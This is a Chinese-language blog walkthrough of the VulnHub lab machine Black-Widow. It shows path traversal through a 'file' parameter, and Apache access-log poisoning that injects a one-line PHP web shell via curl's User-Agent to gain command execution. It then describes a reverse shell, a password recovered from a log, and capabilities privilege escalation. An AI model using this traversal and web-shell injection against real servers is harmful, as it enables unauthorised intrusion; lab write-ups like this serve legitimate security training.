vulnhub靶场之Black-Widow-final

最新推荐文章于 2024-07-15 15:59:36 发布
最新推荐文章于 2024-07-15 15:59:36 发布
阅读量1k 收藏
点赞数 2
文章标签: php apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42478365/article/details/130464816
版权

1.信息收集

探测存活主机,发现192.168.239.177存活
在这里插入图片描述
对目标主机192.168.239.177进行端口扫描,发现存活22、80、111、2049、3128等端口
在这里插入图片描述
在浏览器中访问http://192.168.239.177,并查看源码,未发现有用的信息
在这里插入图片描述
对http://192.168.239.177进行目录扫描,发现/company目录
在这里插入图片描述
查看源码发现有参数file,存在文件读取漏洞,但没有反应
在这里插入图片描述
在这里插入图片描述

对http://192.168.239.177/company继续进行目录扫描,发现存在/started.php
在这里插入图片描述
在浏览器中输入http://192.168.239.177/company/started.php?file=../../../../../../../../../../../../../etc/passwd,读取成功
在这里插入图片描述

2.漏洞利用

看到搭建的第三方插件为apache,并且有文件读取漏洞,想到将一句话木马写入到日志中,并利用文件读取漏洞进行getshell。
先探测日志的路径为/var/log/apache2/access.log。
在这里插入图片描述
之后将木马以User-agent的写入access.log之中,输入 curl -A '<?php system($_GET[shell]);?>' http://192.168.239.177
在这里插入图片描述
在浏览器中输入:http://192.168.239.177/company/started.php?file=…/…/…/…/…/…/…/…/…/…/…/…/…/var/log/apache2/access.log&shell=id,执行命令成功
在这里插入图片描述
反弹shell
在这里插入图片描述
在这里插入图片描述

3.提权

查看发先在/var/baclups中,存在auth.log日志文件,auth.log日志文件是用户登录及身份认证日志,可能存在用户名的密码。
在这里插入图片描述
查看日志发现用户名密码可能是?V1p3r2020!?。
在这里插入图片描述
尝试ssh登录成功。
在这里插入图片描述
上传linpeas.sh进行提权信息收集。
在这里插入图片描述
![在这里插入图片描述](https://img-blog.csdnimg.cn/5eef139a2d0a40c388ec47c700fef120.png
查看123.txt发现存在capabilities提权
在这里插入图片描述
在这里插入图片描述
使用capabilities提权为root权限
在这里插入图片描述

冯·诺依曼
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3145
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
【甄选靶场Vulnhub百个项目渗透——项目十七:brainpan-1(windows缓冲区溢出,sudo提权)
人间体佐菲的博客
09-19 628
网络安全,渗透测试,信息安全vulnhub
vulnhub靶场——DarkHole 1
Czheisenberg的博客
02-17 3721
vulnhub靶场——DarkHole 1 WriteUp
小白渗透0-1:BlackMarket靶场渗透记录
qq_49399033的博客
07-01 1243
这是一次BlackMarket靶场渗透记录
Vulhub靶场环境搭建
读书 买花 长大
02-23 2493
vulhub
Python库 | black-widow-1.7.0.tar.gz
05-12
资源分类:Python库 所属语言:Python 资源全名:black-widow-1.7.0.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python-BlackWidow基于Python的Web应用程序扫描程序
08-12
6. **1N3-BlackWidow-d82cf9a**: 这可能是BlackWidow的一个特定版本或分支标识。在开源项目中,这种命名方式通常是Git仓库中的提交哈希,用于跟踪代码的特定状态或更新。 7. **渗透测试**: 使用BlackWidow这样...
BlackWidow v6.28.zip
07-03
BlackWidow是一个非常不错的离线浏览程序。可以方便的设置下载的网站的级数,以及下载文件的类型。特别提供自动的压缩功能,可以使你节省不少硬盘空间。同时,它还提供一个管理数据库,可以使你快捷方便的找到所需...
BlackWidow - 基于Python的Web应用程序扫描程序-python
06-18
关于:BlackWidow 是一个基于 Python 的网络应用程序蜘蛛,用于从目标网站收集子域、URL、动态参数、电子邮件地址和电话号码。 该项目还包括 Inject-X 模糊器,用于扫描动态 URL 以查找常见的 OWASP 漏洞。 演示...
浏览器辅助工具 BlackWidow v6.28
10-22
BlackWidow v6.28 是一款专为提升在线浏览体验而设计的高效离线浏览器辅助...在压缩包中的 BlackWidow-v6.28 文件包含了该版本的完整安装程序和可能的相关文档,确保用户能够顺利安装和使用这款强大的浏览器辅助工具。
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1598
Vulnhub-CTF5靶机实战
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
[vulnhub]Kevgir: 1-Writeup
Vicl1fe的博客
12-27 1350
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/kevgir-1,137/ 靶机知识点: 靶机IP:192.168.34.170 kali IP:192.168.34.80 信息收集 nmap -sV -p- 192.168.34.170 端口有点多。 有4个http服务:80,808...
Vulhub靶场搭建
weixin_44283446的博客
03-21 5469
Vulhub靶场搭建说明环境说明搭建过程 说明 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 op : 留一个搭建记录贴~ 环境说明 centos linux 搭建过程 安装docker curl -s https://get.docker.com/ | sh 查看docker安装情况:docker -v 2. 安装docker-compos
vulhub-靶场实战-安装
ad12456的博客
05-06 2138
vulhub靶场安装
什么是RPC?有哪些RPC框架?
yuiezt的专栏
07-09 1873
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
三级_网络技术_14_局域网技术基础及应用
2301_80961833的博客
07-12 398
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 556
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
ns3-gym入门(二):linear-mesh例子详解
最新发布
zoe2222226666的博客
07-15 654
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
widow安装redis
07-15
要在Windows上安装Redis,您可以按照以下步骤进行操作: 1. 访问Redis的官方网站(https://redis.io/)并下载最新的Windows版本。 2. 解压下载的Redis压缩包到您选择的目录,例如 `C:\Redis`。 3. 在Redis目录中找到 `redis.windows.conf` 文件,并将其重命名为 `redis.conf`。 4. 打开 `redis.conf` 文件,并根据您的需求进行配置修改。例如,您可以更改Redis的端口号、设置密码等。 5. 打开命令提示符(cmd)并导航到Redis目录,例如 `cd C:\Redis`。 6. 在命令提示符中执行以下指令启动Redis服务器: ``` redis-server.exe redis.conf ``` 7. 如果一切顺利,您应该可以看到Redis服务器成功启动。 8. 另外,如果您想要使用Redis的客户端界面,可以打开新的命令提示符窗口,导航到Redis目录,并执行以下指令启动Redis客户端: ``` redis-cli.exe ``` 9. 现在您可以在Redis客户端窗口中执行各种Redis命令进行操作。 这样,您就成功在Windows上安装了Redis。请注意,上述步骤仅适用于基本的单机模式安装。如果您需要配置Redis集群或其他高级功能,请参考Redis官方文档以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值